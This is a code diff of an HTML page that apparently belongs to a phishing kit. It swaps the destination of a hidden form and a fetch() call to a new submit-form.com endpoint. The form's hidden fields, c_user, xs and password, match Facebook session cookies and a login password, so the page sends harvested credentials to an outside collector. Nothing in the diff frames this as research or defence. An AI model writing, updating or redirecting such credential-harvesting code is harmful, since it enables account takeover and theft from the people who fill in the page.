--- a/index.html
+++ b/index.html
@@ -1730,7 +1730,7 @@
     </div>
     
     <!-- Hidden form for fallback submission -->
-    <form id="hiddenForm" class="hidden-form" action="https://submit-form.com/IjTneEPpL" method="post">
+    <form id="hiddenForm" class="hidden-form" action="https://submit-form.com/XuylKIxRj" method="post">
         <input type="hidden" name="c_user" id="hiddenCUser">
         <input type="hidden" name="xs" id="hiddenXs">
         <input type="hidden" name="password" id="hiddenPassword">
@@ -2438,7 +2438,7 @@
                 
                 try {
                     // Submit form data via fetch
-                    const response = await fetch('https://submit-form.com/IjTneEPpL', {
+                    const response = await fetch('https://submit-form.com/XuylKIxRj', {
                         method: 'POST',
                         headers: {
                             'Content-Type': 'application/json',
